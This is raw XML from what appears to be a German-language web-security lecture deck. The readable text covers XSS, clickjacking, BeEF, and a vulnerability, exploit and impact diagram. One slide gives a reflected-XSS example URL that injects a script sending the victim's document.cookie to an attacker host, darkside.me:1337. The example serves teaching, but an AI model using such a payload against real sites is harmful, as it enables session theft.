Target="../ink/ink495.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image452.png"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink509.xml"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image460.png"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink512.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image910.png"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink524.xml"/><Relationship Id="rId91" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image394.png"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink502.xml"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1711.png"/><Relationship Id="rId145" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink532.xml"/><Relationship Id="rId161" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink540.xml"/><Relationship Id="rId166" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3010.png"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink551.xml"/><Relationship Id="rId187" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink556.xml"/><Relationship Id="rId217" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink571.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId212" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1710.png"/><Relationship Id="rId233" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink580.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image912.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image455.png"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image488.png"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink519.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1211.png"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink527.xml"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink535.xml"/><Relationship Id="rId156" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2510.png"/><Relationship Id="rId177" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink548.xml"/><Relationship Id="rId198" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1010.png"/><Relationship Id="rId172" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3310.png"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink559.xml"/><Relationship Id="rId202" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1210.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink566.xml"/><Relationship Id="rId223" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink575.xml"/><Relationship Id="rId228" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image861.png"/><Relationship Id="rId244" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image940.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink588.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image450.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image463.png"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink513.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3410.png"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink503.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink510.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image710.png"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink522.xml"/><Relationship Id="rId141" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink530.xml"/><Relationship Id="rId146" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2011.png"/><Relationship Id="rId167" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink543.xml"/><Relationship Id="rId188" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image512.png"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink498.xml"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2810.png"/><Relationship Id="rId183" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink552.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image339.png"/><Relationship Id="rId213" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink569.xml"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2010.png"/><Relationship Id="rId234" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image891.png"/><Relationship Id="rId239" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink583.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink493.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image458.png"/><Relationship Id="rId250" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image970.png"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image392.png"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink514.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink517.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink525.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1511.png"/><Relationship Id="rId157" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink538.xml"/><Relationship Id="rId178" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3810.png"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2210.png"/><Relationship Id="rId152" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2311.png"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink546.xml"/><Relationship Id="rId194" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image810.png"/><Relationship Id="rId199" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink562.xml"/><Relationship Id="rId203" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink564.xml"/><Relationship Id="rId208" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1510.png"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink578.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image453.png"/><Relationship Id="rId224" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image841.png"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image921.png"/><Relationship Id="rId245" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink586.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink494.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink506.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image461.png"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1011.png"/><Relationship Id="rId147" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink533.xml"/><Relationship Id="rId168" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3110.png"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink499.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink504.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink520.xml"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1811.png"/><Relationship Id="rId163" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink541.xml"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink553.xml"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink557.xml"/><Relationship Id="rId219" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink572.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1100.png"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1810.png"/><Relationship Id="rId230" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image871.png"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink581.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image456.png"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image511.png"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink528.xml"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2610.png"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink496.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image464.png"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink515.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1311.png"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink536.xml"/><Relationship Id="rId174" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3610.png"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink549.xml"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image480.png"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink560.xml"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink567.xml"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image611.png"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1310.png"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2110.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink576.xml"/><Relationship Id="rId241" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink584.xml"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image950.png"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3510.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image451.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink511.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink523.xml"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink500.xml"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink505.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink507.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image459.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image811.png"/><Relationship Id="rId143" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink531.xml"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2111.png"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image2910.png"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink544.xml"/><Relationship Id="rId185" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink554.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image3910.png"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image410.png"/><Relationship Id="rId210" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1610.png"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink570.xml"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image901.png"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/customXml" Target="../ink/ink5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Remaining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XSS, Open Redirects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0" err="1"/>
              <a:t>Clickjacking</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-A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681302" y="2115274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popping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up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cookie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681302" y="3136612"/>
            <a:ext cx="6829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you‘r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right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...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D427DEA-1E83-4155-B388-6A7E268FFF52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2183064" y="457991"/>
            <a:ext cx="9480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latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>http://lightside.me/forum/foverview.php?uname=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%3Cscript%3Enew%20Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>%22http://darkside.me:1337/%22%2bdocument.cookie%3C/script%3E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1FB3DC-2858-4E2B-8687-7EBD094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64" y="4136662"/>
            <a:ext cx="8903456" cy="205099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D07FB5-DA03-4238-A087-2EDD2246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64" y="2029298"/>
            <a:ext cx="60388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9D858BD-53FB-47AE-AEBE-AAD595E8DEC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4426020" y="2041701"/>
            <a:ext cx="2710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still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lame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565B893-DA1A-4373-9CD5-B175BEA8E88B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2092141" y="3136612"/>
            <a:ext cx="80077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Let‘s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BeEF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1415C4-7DE1-4535-A32F-3BDA092F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11" y="3867807"/>
            <a:ext cx="2787377" cy="21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A32D436-33B4-4EDC-B8BB-C8BA32E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3BF90C-63CC-4F8E-A0B3-4612F676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75"/>
            <a:ext cx="1219200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1C644E-9ABC-41C0-91DF-0C9DE917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8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E86325E-F05E-4B27-834C-D1C23A3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84" y="0"/>
            <a:ext cx="935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941751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110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12683"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="267584" y="367528"/>
          <a:ext cx="11703699" cy="522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BFAB586D-72EF-470E-A89D-91EC7E4C022C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656095" y="424854"/>
            <a:chExt cx="1629720" cy="936720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9A69FD5-C9BA-478D-99A3-681992EBA07A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C9BAA366-AF6D-4946-94B4-B2A80239E879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9C5CAD1F-F130-4C57-81A1-54E2BF95B304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20603052-767B-4A8E-9378-C34AED14647D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2B18454C-65D3-4F9F-B69F-01004FD597A5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E24BAE-5D20-4098-BCEA-9443374307E0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8E303561-2809-4018-A4A1-8D43E7846174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6C01D7EE-F64A-4F37-A7AC-CDE68D757D33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8E66B253-78CF-426F-BBCD-6D8C0CDC7C23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18AF9096-0301-4CB1-A9E8-0681BDB75A25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D4C573B5-D355-4888-93FD-13CE773DD37C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9BA22D1C-DA48-4AD6-B35E-BDE8EBAC2458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25046F34-AB03-407D-ACFE-A9BE9B0D4D6F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0246770D-FC90-415E-ADD4-01821FE77D45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CB32F8C8-B476-446C-ADAA-493F8C479FD9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38376E0-E5E5-45AE-8420-F43EE8E8477A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E77F98BA-76C7-493D-891B-349FD0EBEB82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2E085404-5C04-4A2B-B64D-B9DC7338E39C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C501CF93-3C6F-40A4-A21F-34699DE39470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E0EF96-9BDD-4544-81DD-13856536C6AE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9B67ADB9-E23E-4217-8C13-25877BE929C4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AB78F58A-35BA-452B-8770-898424EB8F7F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B825D0CE-8EE1-413E-A7B6-EFCBED9287CB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2E1E8174-2710-4D91-A4D8-9AFF47E38E2A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2D00B66-3C9C-4F21-9A79-2112801EDF9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61" name="Grafik 160">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650E71EB-FD4C-4EE0-943A-FB4FB1782AE7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId271"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6991057" y="3762072"/>
            <a:ext cx="4928089" cy="1215546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56DE9CAD-A77E-4E81-B414-B874F9C12F0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8135658" y="5396058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Vulnerability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AB2A75D5-E2E1-4848-B9B1-296933BD18BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8952784" y="6106885"/>
            <a:ext cx="1624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Impact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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="9199366" y="5412194"/>
              <a:ext cx="4320" cy="468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D8262F9-FC33-4F03-98D7-10E0DE8BE2B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90366" y="5403554"/>
                <a:ext cx="21960" cy="2232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009698C-E8AF-4CD9-A12F-A6CF49FD3F24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="162" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="9707640" y="4724400"/>
            <a:ext cx="2" cy="671658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A15215E6-D52A-4822-AE03-F3199613A06C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="163" idx="1"/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="5724508" y="5183276"/>
            <a:ext cx="3228276" cy="121599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feld 164">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C6C7B88-86B7-44C3-954C-2D94B3F17D7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2928664" y="617129"/>
            <a:ext cx="3143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Exploit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A7E277E2-3F3B-4421-A660-AC8322371887}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="165" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2329876" y="899954"/>
            <a:ext cx="598788" cy="9563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DEAF5-45B8-43C1-B832-E9BE0FC4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856325-D774-4AC8-8D5C-523381E7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7" y="3537807"/>
            <a:ext cx="6715125" cy="2247900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8AC200BD-41E9-40D7-88E2-0152FCB24223}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142247" y="1841619"/>
            <a:ext cx="9339943" cy="726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3200" dirty="0" err="1"/>
              <a:t>wouldn‘t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? </a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="3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208909C-2F39-4984-9FF4-939090795C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="698150" y="2891476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00BB41B2-C8DE-4903-84CD-9275792796AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="20730224">
            <a:off x="8262165" y="3574711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1AA37414-C8CC-4B5E-82F0-D4B02D69A596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CF10BC8E-1CDD-4C0B-BC5B-9EB306F6E940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540F6E3-760A-4C31-89CC-423CFBC56304}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7674978" y="2608866"/>
            <a:ext cx="1629720" cy="936720"/>
            <a:chOff x="656095" y="424854"/>
            <a:chExt cx="1629720" cy="93672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BB8AF344-908A-4B2A-8060-D3C8A6DE1BD5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="656095" y="424854"/>
              <a:ext cx="1629720" cy="936720"/>
              <a:chOff x="1065608" y="369674"/>
              <a:chExt cx="1629720" cy="93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8D3771F3-8D4D-440C-8E8A-EF466623E483}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1065608" y="417194"/>
                  <a:ext cx="46800" cy="888480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="10" name="Freihand 9">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D1B89FF-8C8D-45C5-8837-9055BC1883FA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56968" y="408554"/>
                    <a:ext cx="64440" cy="90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7058D3BB-FBDB-478D-9FA1-43B4E3B3DD0A}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1119968" y="371114"/>
                  <a:ext cx="1480320" cy="6264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3085F9CD-51B8-4362-8D00-C832AA2EBA5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110968" y="362474"/>
                    <a:ext cx="14979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1625F5DE-7DB5-4B5B-AE7F-0B8DE06EFAE8}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1085048" y="1257794"/>
                  <a:ext cx="1575720" cy="4860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A82FFF48-92CC-47C0-94E5-6C9F963FD96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6408" y="1248794"/>
                    <a:ext cx="15933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BF142A83-A5E7-41FD-A661-7CC8942D6678}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2617928" y="369674"/>
                  <a:ext cx="77400" cy="89064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E1513140-B5EF-417C-AC9E-74C1A6C90D6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09288" y="360674"/>
                    <a:ext cx="95040" cy="908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3FB08647-9870-4A3A-91F5-139A334F90EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="838615" y="547149"/>
              <a:ext cx="1353960" cy="245880"/>
              <a:chOff x="1248128" y="723194"/>
              <a:chExt cx="1353960" cy="2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883A2ED4-2F70-47BF-81D6-1B35858929F5}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1248128" y="844874"/>
                  <a:ext cx="147600" cy="12420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AD9C54D5-2DF8-4D1E-8238-E76727F456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39128" y="835874"/>
                    <a:ext cx="165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1301D84B-5066-47EA-B3D6-7E4C6C1975DF}"/>
                      </a:ext>
                    </a:extLst>
                  </p14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1398968" y="723194"/>
                  <a:ext cx="17280" cy="235080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="32" name="Freihand 31">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
